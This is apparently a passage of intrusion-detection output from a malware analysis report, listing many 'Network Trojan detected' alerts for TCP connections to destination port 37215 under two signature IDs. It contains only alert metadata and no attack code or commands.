            Timestamp:05/28/24-09:57:32.070222
            SID:2829579
            Source Port:49368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849552
            SID:2835222
            Source Port:54968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290882
            SID:2829579
            Source Port:45774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013886
            SID:2829579
            Source Port:50678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581739
            SID:2829579
            Source Port:53726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770934
            SID:2829579
            Source Port:46030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823646
            SID:2829579
            Source Port:57892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058458
            SID:2829579
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989717
            SID:2835222
            Source Port:42334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011293
            SID:2829579
            Source Port:60634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739856
            SID:2829579
            Source Port:57262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760168
            SID:2829579
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533371
            SID:2835222
            Source Port:45686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550378
            SID:2829579
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378334
            SID:2835222
            Source Port:45826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927010
            SID:2835222
            Source Port:43706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508073
            SID:2835222
            Source Port:46694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778437
            SID:2835222
            Source Port:56082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776249
            SID:2829579
            Source Port:50920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542617
            SID:2835222
            Source Port:45150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955882
            SID:2835222
            Source Port:43278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948061
            SID:2835222
            Source Port:46566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063454
            SID:2829579
            Source Port:57832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039872
            SID:2829579
            Source Port:56610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038436
            SID:2829579
            Source Port:47258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040344
            SID:2829579
            Source Port:36874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855523
            SID:2835222
            Source Port:46812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730642
            SID:2829579
            Source Port:47050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714543
            SID:2835222
            Source Port:57324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654793
            SID:2829579
            Source Port:39362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917428
            SID:2835222
            Source Port:47958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736028
            SID:2829579
            Source Port:48246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938155
            SID:2829579
            Source Port:52348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746760
            SID:2835222
            Source Port:38574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746141
            SID:2829579
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840970
            SID:2829579
            Source Port:47840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059942
            SID:2835222
            Source Port:39776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986201
            SID:2829579
            Source Port:33890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841488
            SID:2829579
            Source Port:44546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052302
            SID:2829579
            Source Port:40398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507621
            SID:2835222
            Source Port:40336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735267
            SID:2835222
            Source Port:54364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913136
            SID:2829579
            Source Port:39052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922363
            SID:2829579
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.915335
            SID:2829579
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.538241
            SID:2835222
            Source Port:44622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314377
            SID:2829579
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.702742
            SID:2835222
            Source Port:44692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847826
            SID:2835222
            Source Port:57086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926871
            SID:2835222
            Source Port:41372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623449
            SID:2829579
            Source Port:50600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962914
            SID:2829579
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.789092
            SID:2829579
            Source Port:59602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424006
            SID:2829579
            Source Port:50396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471258
            SID:2835222
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069665
            SID:2829579
            Source Port:42702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873235
            SID:2829579
            Source Port:40760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732745
            SID:2835222
            Source Port:56374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073027
            SID:2829579
            Source Port:46260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026529
            SID:2829579
            Source Port:53350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078553
            SID:2829579
            Source Port:43632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929497
            SID:2829579
            Source Port:50338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291517
            SID:2829579
            Source Port:45216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058858
            SID:2835222
            Source Port:56012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870044
            SID:2829579
            Source Port:48188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870234
            SID:2835222
            Source Port:48410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963481
            SID:2829579
            Source Port:57262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231279
            SID:2829579
            Source Port:59076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330660
            SID:2829579
            Source Port:37368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445001
            SID:2829579
            Source Port:41820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069808
            SID:2829579
            Source Port:43284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816812
            SID:2835222
            Source Port:58092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520890
            SID:2829579
            Source Port:40652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033347
            SID:2835222
            Source Port:48896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327164
            SID:2829579
            Source Port:35734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421381
            SID:2829579
            Source Port:43212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685745
            SID:2835222
            Source Port:38118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015476
            SID:2829579
            Source Port:34006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850451
            SID:2829579
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893058
            SID:2835222
            Source Port:48396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935087
            SID:2835222
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676720
            SID:2829579
            Source Port:47320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864682
            SID:2835222
            Source Port:56950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779046
            SID:2829579
            Source Port:50098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058890
            SID:2835222
            Source Port:40278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788995
            SID:2835222
            Source Port:53772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604260
            SID:2829579
            Source Port:38220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879473
            SID:2835222
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994347
            SID:2829579
            Source Port:34472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734458
            SID:2835222
            Source Port:47762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811918
            SID:2835222
            Source Port:59710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828170
            SID:2835222
            Source Port:37060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048682
            SID:2829579
            Source Port:53570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.616931
            SID:2835222
            Source Port:42100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757818
            SID:2829579
            Source Port:44090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924890
            SID:2835222
            Source Port:53894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289604
            SID:2835222
            Source Port:45886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742776
            SID:2829579
            Source Port:58416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712963
            SID:2829579
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899734
            SID:2829579
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280244
            SID:2829579
            Source Port:36296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943591
            SID:2835222
            Source Port:52612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922294
            SID:2829579
            Source Port:55540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047969
            SID:2835222
            Source Port:59174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862510
            SID:2829579
            Source Port:55696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852635
            SID:2835222
            Source Port:58564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322494
            SID:2835222
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955705
            SID:2835222
            Source Port:50496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966909
            SID:2829579
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284359
            SID:2835222
            Source Port:34630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583376
            SID:2835222
            Source Port:34118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938937
            SID:2829579
            Source Port:49504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808105
            SID:2829579
            Source Port:40496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509802
            SID:2829579
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893360
            SID:2829579
            Source Port:42202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026874
            SID:2835222
            Source Port:58068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.009328
            SID:2835222
            Source Port:33176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.322190
            SID:2835222
            Source Port:55380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051125
            SID:2835222
            Source Port:46570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.030966
            SID:2835222
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857026
            SID:2835222
            Source Port:51070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924894
            SID:2835222
            Source Port:34648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464981
            SID:2835222
            Source Port:34484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957244
            SID:2829579
            Source Port:46910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508290
            SID:2829579
            Source Port:58938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565520
            SID:2835222
            Source Port:57336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308715
            SID:2835222
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.660772
            SID:2829579
            Source Port:59438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307660
            SID:2829579
            Source Port:53400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510404
            SID:2835222
            Source Port:56286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849414
            SID:2829579
            Source Port:42768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542628
            SID:2829579
            Source Port:49688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739544
            SID:2829579
            Source Port:54128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923471
            SID:2835222
            Source Port:50710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966461
            SID:2829579
            Source Port:41244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067283
            SID:2829579
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582346
            SID:2835222
            Source Port:44446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380488
            SID:2835222
            Source Port:45836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697335
            SID:2835222
            Source Port:60900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665819
            SID:2835222
            Source Port:40016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862890
            SID:2835222
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276175
            SID:2829579
            Source Port:44032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805979
            SID:2835222
            Source Port:41032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047892
            SID:2835222
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050840
            SID:2829579
            Source Port:52466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071929
            SID:2835222
            Source Port:51948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732722
            SID:2829579
            Source Port:59776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956269
            SID:2835222
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400288
            SID:2829579
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776391
            SID:2835222
            Source Port:33262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841067
            SID:2829579
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872721
            SID:2835222
            Source Port:57660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.238122
            SID:2829579
            Source Port:57560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.030278
            SID:2829579
            Source Port:44524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024650
            SID:2829579
            Source Port:39812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930035
            SID:2835222
            Source Port:57732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.402051
            SID:2829579
            Source Port:45366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556239
            SID:2829579
            Source Port:47854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868633
            SID:2835222
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714756
            SID:2835222
            Source Port:42264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868051
            SID:2829579
            Source Port:47630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929452
            SID:2829579
            Source Port:36000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789207
            SID:2829579
            Source Port:46174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809584
            SID:2829579
            Source Port:36132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917232
            SID:2835222
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277994
            SID:2829579
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823601
            SID:2829579
            Source Port:48540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313293
            SID:2829579
            Source Port:55758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596580
            SID:2835222
            Source Port:52172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518678
            SID:2835222
            Source Port:38606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895558
            SID:2829579
            Source Port:59630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467311
            SID:2829579
            Source Port:59302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862035
            SID:2835222
            Source Port:53088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555515
            SID:2835222
            Source Port:42232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855516
            SID:2829579
            Source Port:59972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061492
            SID:2829579
            Source Port:38182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.725033
            SID:2829579
            Source Port:35280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310600
            SID:2829579
            Source Port:51146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.363723
            SID:2829579
            Source Port:36158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879829
            SID:2835222
            Source Port:33230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.938976
            SID:2829579
            Source Port:60644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850257
            SID:2835222
            Source Port:60000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435436
            SID:2829579
            Source Port:37282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858030
            SID:2835222
            Source Port:43052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318867
            SID:2835222
            Source Port:44644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719407
            SID:2829579
            Source Port:53098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412904
            SID:2835222
            Source Port:53504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.624062
            SID:2835222
            Source Port:37598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857645
            SID:2835222
            Source Port:60572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922718
            SID:2835222
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776988
            SID:2835222
            Source Port:48580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053868
            SID:2829579
            Source Port:50816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056022
            SID:2829579
            Source Port:60326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945250
            SID:2829579
            Source Port:35808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779997
            SID:2835222
            Source Port:50652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909015
            SID:2829579
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963161
            SID:2835222
            Source Port:35408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251046
